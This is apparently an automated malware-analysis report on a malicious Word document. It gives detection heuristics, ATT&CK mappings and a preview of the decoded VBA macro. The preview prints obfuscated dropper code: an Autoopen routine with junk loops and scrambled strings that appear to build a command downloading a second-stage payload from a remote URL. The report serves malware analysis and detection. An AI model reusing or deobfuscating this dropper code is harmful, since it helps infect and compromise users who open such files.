Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a legacy WordBasic Autoopen macro. This macro utilizes a Shell() call, indicating an intent to execute external commands, likely for downloading and running a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6529701-0' further supports its dropper functionality.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6529701-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6529701-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 148428 bytes | 26a97d07df0f650f98e4dc5418ac9db5129da4ba586163fd9b3cc5a88b6a83fd |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "zTYJnQbdkSvi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOGzBc(YJIoP)
IOakuA = Chr(17913)
For YFqUW = 63075 To 97827
iWrrnc = 42867 / 23190 / cWBNnp * 81497 - 78778 - Tan(1 / Rnd(tmFFr))
Next
End Sub
Sub QQcIQc(vJkamw)
vjsOl = Chr(35212)
For IKkQzf = 632 To 76125
jdiwb = 43829 / 99276 / vWzar * 55281 - 26176 - Tan(1 / Rnd(uQZMu))
Next
TZRIFr = Chr(86045)
For wfIzB = 93076 To 14343
zZjiSP = 40707 / 6685 / hXNFP * 50658 - 51167 - Tan(1 / Rnd(sKFfS))
Next
HUfZS = Chr(35644)
For bRvuTA = 62248 To 30139
DENrY = 39721 / 60275 / hEhfI * 72995 - 3466 - Tan(1 / Rnd(iIYKn))
Next
End Sub
Sub DkWGFS(wZuCU)
BRbsn = Chr(79369)
For sNkOT = 60104 To 87563
osHFk = 27751 / 1882 / VRONzk * 60065 - 75635 - Tan(1 / Rnd(nfADDP))
Next
UTwpzH = Chr(74981)
For YmHhmw = 69686 To 84680
oGaYb = 41132 / 15275 / zlfztV * 70850 - 55315 - Tan(1 / Rnd(kRRLc))
Next
End Sub
Sub Autoopen()
On Error Resume Next
iooMc = Chr(96334)
For jDnzP = 95231 To 78742
szoHC = 41994 / 14746 / fRXEQM * 36490 - 50866 - Tan(1 / Rnd(LsvknJ))
Next
tQDiituvjGDhc (jwFbMt + zpFkHWzkcEN + nnIrT)
DarXNJ = Chr(90257)
For tkTkN = 19642 To 7993
tcFoJ = 46276 / 10367 / fOlLj * 31850 - 14975 - Tan(1 / Rnd(zzmkB))
Next
End Sub
Sub XdOZq(lrzjB)
ujmiSf = Chr(40770)
For rwXjVd = 54336 To 99805
PXTDUF = 53347 / 51138 / hsioPC * 19287 - 2653 - Tan(1 / Rnd(bhUiH))
Next
ZjYGi = Chr(6991)
For kmFkL = 65825 To 58937
aKEiz = 55242 / 95251 / jVZUH * 1150 - 35075 - Tan(1 / Rnd(kQDin))
Next
VvjUHs = Chr(67157)
For qbWwBW = 31698 To 92685
mbipk = 10685 / 67613 / kTpzv * 58497 - 718 - Tan(1 / Rnd(tpICcU))
Next
End Sub
Sub TDizz(zvzoG)
CJrkq = Chr(95164)
For XYtfv = 94964 To 43004
HhIui = 34498 / 43281 / lGIlu * 70156 - 47132 - Tan(1 / Rnd(LpNwcC))
Next
End Sub
Attribute VB_Name = "SENzhaY"
Sub AbAsNr(YzfwFi)
MUnzEU = Chr(12773)
For YhEdpp = 39975 To 39955
kNXHKu = 84592 / 21526 / RQOSdz * 49532 - 69397 - Tan(1 / Rnd(tJhWDc))
Next
End Sub
Function zpFkHWzkcEN()
On Error Resume Next
SmmWf = Chr(3491)
For sAWXR = 32030 To 50206
DzkEHR = 15113 / 66060 / aDsTkC * 35426 - 70983 - Tan(1 / Rnd(qvDtJw))
Next
wYHkKlt = ACXrLz("HRjQ'+'5'+'fds//'+':ptth '+'lw'+'B'+' = XCDA'+'L1'+'N'+';'+')33'+'1282 ,00'+'0'+'0DMi", 46856 - 46856 + 4 + 46856 - 46856, 46856 - 46856 + 78 + 46856 - 46856)
ANjYwN = Chr(56068)
For wBOEM = 59818 To 4573
EAvbI = 90410 / 16045 / Empaii * 18752 - 79033 - Tan(1 / Rnd(RGDYJp))
Next
QwmbwD = Chr(15160)
For AAFjs = 59181 To 7315
iuumT = 94716 / 91674 / ivtuTS * 16986 - 20047 - Tan(1 / Rnd(JGkSPQ))
Next
BSmtjbOEs = ACXrLz("hp.c[((eCAlpER.)'}}{hcta'+'c};'+'kaerb;)CDSL1'+'N'+'()izb,", 25848 - 25848 + 5 + 25848 - 25848, 25848 - 25848 + 51 + 25848 - 25848)
UBozwB = Chr(74354)
For oNwikJ = 23325 To 36872
LsDJM = 6046 / 64636 / vwjYTB * 36649 - 58426 - Tan(1 / Rnd(RRIwc))
Next
niiShl = Chr(32953)
For mMhcJJ = 19542 To 66361
UWDTvc = 75666 / 65552 / DXiws * 18380 - 32389 - Tan(1 / Rnd(FqtmE))
Next
TVOQwqin = ACXrLz("fM0nray'+'.8'+'poop=l?p'+'hp'+'.'+'vtset'+'/'+'KRAN/'+'mo'+'c'+'.r'+'ew'+'4r'+'e'+'woXscl", 64105 - 64105 + 6 + 64105 - 64105, 64105 - 64105 + 81 + 64105 - 64105)
cKjjBb = Chr(38036)
For NidHi = 97518 To 54893
Gvkait = 99152 / 77225 / XLDDT * 78777 - 5078 - Tan(1 / Rnd(XaILv))
Next
aGzhVR = Chr(52414)
For mPqSj = 47334 To 78941
zQJIC = 52382 / 88687 / qimEVU * 63090 - 64410 - Tan(1 / Rnd(QTnZM))
Next
YjGPjBMXFb = ACXrLz("%,XbEw)'xbma", 72373 - 72373 + 4 + 72373 - 72373, 72373 - 72373 + 3 + 72373 - 72373)
OwmmcW = Chr(64387)
For EpRXaU = 3022 To 92224
... (truncated)